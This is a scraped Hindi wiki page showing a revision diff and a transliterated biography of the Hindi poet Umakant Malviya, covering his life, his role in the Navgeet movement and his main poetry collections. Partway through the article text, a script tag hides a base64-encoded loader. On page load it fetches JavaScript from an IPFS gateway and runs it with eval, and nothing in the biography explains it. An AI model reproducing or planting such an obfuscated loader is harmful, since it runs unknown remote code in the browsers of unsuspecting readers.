Difference between revisions of "उमाकांत मालवीय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''उमाकांत मालवीय''' (अंग्रेज़ी: ''Umakant Malviya'', जन्म: 2 अगस्त...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 +
{{सूचना बक्सा साहित्यकार
 +
|चित्र=Umakant-malviya.jpg
 +
|चित्र का नाम=उमाकांत मालवीय
 +
|पूरा नाम=उमाकांत मालवीय
 +
|अन्य नाम=
 +
|जन्म=[[2 अगस्त]], [[1931]]
 +
|जन्म भूमि= [[मुंबई]], [[महाराष्ट्र]]
 +
|मृत्यु=[[11 नवम्बर]], [[1982]]
 +
|मृत्यु स्थान=[[इलाहाबाद]], [[उत्तर प्रदेश]]
 +
|अविभावक=
 +
|पालक माता-पिता=
 +
|पति/पत्नी=
 +
|संतान=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र=[[कवि]] एवं गीतकार
 +
|मुख्य रचनाएँ='मेहंदी और महावर', 'देवकी', 'रक्तपथ', 'एक चावल नेह रींधा', 'सुबह रक्तपलाश की'
 +
|विषय=
 +
|भाषा=[[हिंदी]]
 +
|विद्यालय=
 +
|शिक्षा=
 +
|पुरस्कार-उपाधि=
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी= ‘नवगीत’ आंदोलन के वे एक प्रमुख उन्नायक थे। कई कवि सम्मेलनों में उनके ‘नवगीतों’ ने बड़ी धूम मचा दी थी।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 
'''उमाकांत मालवीय''' ([[अंग्रेज़ी]]: ''Umakant Malviya'', जन्म: [[2 अगस्त]], [[1931]] - मृत्यु: [[11 नवम्बर]], [[1982]]) [[भारत]] के प्रतिष्टित [[हिंदी]] [[कवि]] एवं गीतकार थे।
 
'''उमाकांत मालवीय''' ([[अंग्रेज़ी]]: ''Umakant Malviya'', जन्म: [[2 अगस्त]], [[1931]] - मृत्यु: [[11 नवम्बर]], [[1982]]) [[भारत]] के प्रतिष्टित [[हिंदी]] [[कवि]] एवं गीतकार थे।
==संक्षित परिचय==
+
==संक्षिप्त परिचय==
* उमाकांत मालवीय का जन्म 2 अगस्त 1931 को [[मुंबई]] में हुआ उनका निधन 11नवम्बर 1982 को [[इलाहाबाद]] में हुआ।  
+
* उमाकांत मालवीय का जन्म 2 अगस्त 1931 को [[मुंबई]] में हुआ उनका निधन 11 नवम्बर 1982 को [[इलाहाबाद]] में हुआ।  
 
* उमाकांत मालवीय की शिक्षा प्रयाग विश्वविद्यालय में हुई।  
 
* उमाकांत मालवीय की शिक्षा प्रयाग विश्वविद्यालय में हुई।  
 
* इन्होंने [[कविता]] के अतिरिक्त [[खण्डकाव्य]], [[निबंध]] तथा बालोपयोगी पुस्तकें भी लिखी हैं।
 
* इन्होंने [[कविता]] के अतिरिक्त [[खण्डकाव्य]], [[निबंध]] तथा बालोपयोगी पुस्तकें भी लिखी हैं।
 
* काव्य-क्षेत्र में मालवीय जी ने नवगीत विधा को अपनाया।  
 
* काव्य-क्षेत्र में मालवीय जी ने नवगीत विधा को अपनाया।  
 +
* ‘नवगीत’ आंदोलन के वे एक प्रमुख उन्नायक थे।
 
* इनका मत है कि आज के युग में भावों की तीव्रता को संक्षेप में व्यक्त करने में नवगीत पूर्णतया सक्षम है।  
 
* इनका मत है कि आज के युग में भावों की तीव्रता को संक्षेप में व्यक्त करने में नवगीत पूर्णतया सक्षम है।  
 
* कई कवि सम्मेलनों में उनके ‘नवगीतों’ ने बड़ी धूम मचा दी थी।  
 
* कई कवि सम्मेलनों में उनके ‘नवगीतों’ ने बड़ी धूम मचा दी थी।  
* ‘नवगीत’ आंदोलन के वे एक प्रमुख उन्नायक थे। उन्होंने प्रयोगवाद और गीत-विद्या के समन्वय का प्रयत्न किया, जो एक ऐतिहासिक महत्व का कार्य था। उन पर एक स्मारिका भी निकाली है।  
+
* इन्होंने प्रयोगवाद और गीत-विद्या के समन्वय का प्रयत्न किया, जो एक ऐतिहासिक महत्व का कार्य था। उन पर एक स्मारिका भी निकाली है।  
 
==मुख्य कविता-संग्रह==
 
==मुख्य कविता-संग्रह==
 
* `मेहंदी और महावर'
 
* `मेहंदी और महावर'

Revision as of 11:09, 18 March 2014

umakaant malaviy
poora nam umakaant malaviy
janm 2 agast, 1931
janm bhoomi muanbee, maharashtr
mrityu 11 navambar, 1982
mrityu sthan ilahabad, uttar pradesh
karm-kshetr kavi evan gitakar
mukhy rachanaean 'mehandi aur mahavar', 'devaki', 'raktapath', 'ek chaval neh riandha', 'subah raktapalash ki'
bhasha hiandi
nagarikata bharatiy
any janakari ‘navagit’ aandolan ke ve ek pramukh unnayak the. kee kavi sammelanoan mean unake ‘navagitoan’ ne b di dhoom macha di thi.
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

umakaant malaviy (aangrezi: Umakant Malviya, janm: 2 agast, 1931 - mrityu: 11 navambar, 1982) bharat ke pratishtit hiandi kavi evan gitakar the.

sankshipt parichay

  • umakaant malaviy ka janm 2 agast 1931 ko muanbee mean hua unaka nidhan 11 navambar 1982 ko ilahabad mean hua.
  • umakaant malaviy ki shiksha prayag vishvavidyalay mean huee.
  • inhoanne kavita ke atirikt khandakavy, nibandh tatha balopayogi pustakean bhi likhi haian.
  • kavy-kshetr mean malaviy ji ne navagit vidha ko apanaya.
  • ‘navagit’ aandolan ke ve ek pramukh unnayak the.
  • inaka mat hai ki aj ke yug mean bhavoan ki tivrata ko sankshep mean vyakt karane mean navagit poornataya saksham hai.
  • kee kavi sammelanoan mean unake ‘navagitoan’ ne b di dhoom macha di thi.
  • inhoanne prayogavad aur git-vidya ke samanvay ka prayatn kiya, jo ek aitihasik mahatv ka kary tha. un par ek smarika bhi nikali hai.

mukhy kavita-sangrah

  • `mehandi aur mahavar'
  • `devaki'
  • `raktapath'
  • 'ek chaval neh riandha'
  • 'subah raktapalash ki'



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh